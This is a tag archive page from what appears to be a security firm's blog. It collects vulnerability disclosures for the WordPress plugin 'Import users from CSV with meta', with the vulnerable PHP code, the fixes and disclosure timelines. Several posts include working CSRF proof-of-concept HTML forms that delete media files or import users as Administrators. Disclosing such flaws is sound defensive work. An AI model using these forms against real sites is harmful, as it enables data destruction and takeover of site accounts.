Login

Tag Archives: Import users from CSV with meta

28 Jun 2019

Closures of Very Popular WordPress Plugins, Week of June 28

While we already are far ahead of other companies in keeping up with vulnerabilities in WordPress plugins (amazingly that isn’t an exaggeration), in looking in to how we could get even better we noticed that in a recent instance were a vulnerability was exploited in a plugin, we probably could have warned our customers about the vulnerability even sooner if we had looked at the plugin when it was first closed on the Plugin Directory instead of when the vulnerability was fixed (though as far as we are aware the exploitation started after we had warned our customers of the fix). So we are now monitoring to see if any of the 1,000 most popular plugins are closed on the Plugin Directory and then seeing if it looks like that was due to a vulnerability.

This week one of those plugins was closed and it has been reopened.

Import users from CSV with meta

The plugin Import users from CSV with meta, which has 30,000+ installs, was closed on Saturday. While no reason has been given for the closure it would appear it was closed due to a vulnerability we had originally notified the developer back in September, 2016.

It was reopened on Wednesday.

21 Jun 2019

Cross-Site Request Forgery (CSRF)/Media Deletion Vulnerability in Import users from CSV with meta

One of the changelog entries for the latest version of Import users from CSV with meta is “XSS problem fixed when displaying data imported thanks to lckjack who reports it”, while looking to see if there was a vulnerability related to that we should be notifying the customers of our service about if they use that plugin, we found a vulnerability we could confirm still exists. It turns out the plugin’s functionality for deleting files uploaded through it isn’t properly secured, so an attacker could cause logged in Administrators to delete any WordPress media files without intending it.

The plugin registers the function that handles that to be accessible to anyone logged in to WordPress through its AJAX functionality:

56

add_action( 'wp_ajax_acui_delete_attachment', 'acui_delete_attachment' );

The function, which is located in the file /import-users-from-csv-with-meta.php, does restrict who can do the deletion to those with the “manage_option” capability that normally only Administrators have:

678
679
680
681
682
683
684
685
686
687
688
689
690
691
692

function acui_delete_attachment() {
	if( ! current_user_can( 'manage_options' ) )
		wp_die( __('You are not an adminstrator', 'import-users-from-csv-with-meta' ) );
 
	$attach_id = intval( $_POST['attach_id'] );
 
	$result = wp_delete_attachment( $attach_id, true );
 
	if( $result === false )
		echo 0;
	else
		echo 1;
 
	wp_die();
}

What it doesn’t include is a nonce check to prevent cross-site request forgery (CSRF), so an attacker could cause a logged in Administrator to delete an arbitrary media file handled by WordPress. Since the media is deleted based on an integer based ID value an attacker could have them send out multiple request that delete any possible media files.

In addition to check for a nonce, restricting what media files can deleted might be a good idea if possible.

We are the reason that capabilities check is there

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will delete the file associated with specified attachment ID, when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[attachment ID]” with the attachment ID of the media file to be deleted.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=acui_delete_attachment" method="POST">
<input type="hidden" name="attach_id" value="[attachment ID]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
18 Mar 2019

Vulnerability Details: CSRF/XSS in Import users from CSV with meta

This post provides the details of a vulnerability in the WordPress plugin Import users from CSV with meta not discovered by us, where the discoverer hadn't provided the details needed for us to confirm the vulnerability while we were adding it to the data set for our service, so its contents are limited to subscribers of our service.

If you were using our service, you would have already been warned about this vulnerability if your website is vulnerable due to it. You can try out our service for free and then see the details of the vulnerability.

For existing customers, please log in to your account to view the contents of the post.

2 Sep 2016

Authenticated Media Deletion Vulnerability in Import users from CSV with meta

One frequent source of security issues being discovered these days is lack of proper restriction on who can access in functions that are made accessible through WordPress’ AJAX functionality. By default those functions are accessible to anyone who is logged in to WordPress, even though the functions are often intended to only accessible to high level users. For many websites where there is only a single Administrator account or small amount of trusted users these vulnerabilities don’t pose a risk, but for plugins that are intended to be used in environments where that isn’t the case it is more of a concern. One such plugin is Import users from CSV with meta, which allows for importing thousands of users quickly.

As of version 1.9.4.6, the plugin made the function acui_delete_attachment() available through the AJAX functionality in the file /import-users-from-csv-with-meta.php here:

558

add_action( 'wp_ajax_acui_delete_attachment', 'acui_delete_attachment' );

While the function looks to be only intended for Administrators there was no check done as to who is making the request:

499
500
501
502
503
504
505
506
507
508
509
510

function acui_delete_attachment() {
	$attach_id = intval( $_POST['attach_id'] );
 
	$result = wp_delete_attachment( $attach_id, true );
 
	if( $result === false )
		echo 0;
	else
		echo 1;
 
	wp_die();
}

There also is no protection against cross-site request forgery (CSRF) in that.

The function calls the function wp_delete_attachment() with it second parameter set to true, which cause the media file associated with the attachment to be deleted as well as the meta data associate with the attachment. Someone could iterate through all possible attachment IDs to delete all of the media files on the website.

After we notified the developer of the issue, version 1.9.5 was released, which added code that cause the function code to not be accessible if the request comes from a non-Administrator level user:

503
504
505

function acui_delete_attachment() {
        if( ! current_user_can( 'manage_options' ) )
                wp_die( "You are not an adminstrator" );

That restricts lower level users from doing deletions, but the cross-site request forgery (CSRF) issue still exists.

Proof of Concept

The following proof of concept will delete the file associated with specified attachment ID, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[attachment ID]” with the attachment ID of the media file to be deleted.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=acui_delete_attachment" method="POST">
<input type="hidden" name="attach_id" value="[attachment ID]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 8/22/2016 – Developer notified.
  • 8/30/2016 – Version 1.9.5 released, which fixes the issue.
2 Sep 2016

Cross-Site Request Forgery (CSRF)/User Import Vulnerability in Import users from CSV with meta

Recently we have been taking a quick look over plugins that handle importing users into WordPress for security issues, since their functionality could be useful to hackers.

In looking over the Import Vulnerability in Import users from CSV with meta plugin we found that as version 1.9.4.6 the plugin did not include protection against cross-site request forgery (CSRF) for requests to imports users. So if you could get a logged in administrator to access a page you control you could cause them to create new users with the Administrator role that they can then access.

The import is handled through the page /wp-admin/tools.php?page=acui, which is set up with the following line of code in the file /import-users-from-csv-with-meta/trunk/import-users-from-csv-with-meta.php:

94

add_submenu_page( 'tools.php', 'Insert users massively (CSV)', 'Import users from CSV', 'create_users', 'acui', 'acui_options' );

That calls the function acui_options() in the file /importer.php to generate the page. The user import is handled through the function acui_fileupload_process(). The code before that happens in the function checks if the user can “create_users” (which is normally a capability that Administrators have), but didn’t check for a nonce as of version 1.9.4.6:

428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445

function acui_options() 
{
	global $url_plugin;
 
	if ( !current_user_can('create_users') ) {
		wp_die(__('You are not allowed to see this content.'));
	}
 
	if ( isset ( $_GET['tab'] ) ) 
		$tab = $_GET['tab'];
   	else 
   		$tab = 'homepage';
 
 
	if( isset( $_POST ) && !empty( $_POST ) ):
		switch ( $tab ){
      		case 'homepage':
      			acui_fileupload_process( $_POST, false );

The function acui_fileupload_process() also doesn’t check for a nonce.

After we notified the developer of the issue, version 1.9.5 was released, which adds a nonce to the relevant page and checks to make sure a valid one is included when importing users:

229
230
231
232

function acui_fileupload_process( $form_data, $is_cron = false ) {
  if ( ! isset( $_POST['acui-nonce'] ) || ! wp_verify_nonce( $_POST['acui-nonce'], 'acui-import' ) ) {
        wp_die( 'Nonce problem' );
  }

Proof of Concept

The following proof of concept will cause users included in the uploaded CSV file to be added as Administrators, when logged in to WordPress as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress. The plugin comes with sample CSV file name test.csv, which can be used when testing the proof of concept.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=acui" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role[]" value="administrator" />
<input type="file" name="uploadfiles[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 8/22/2016 – Developer notified.
  • 8/30/2016 – Version 1.9.5 released, which fixes the issue.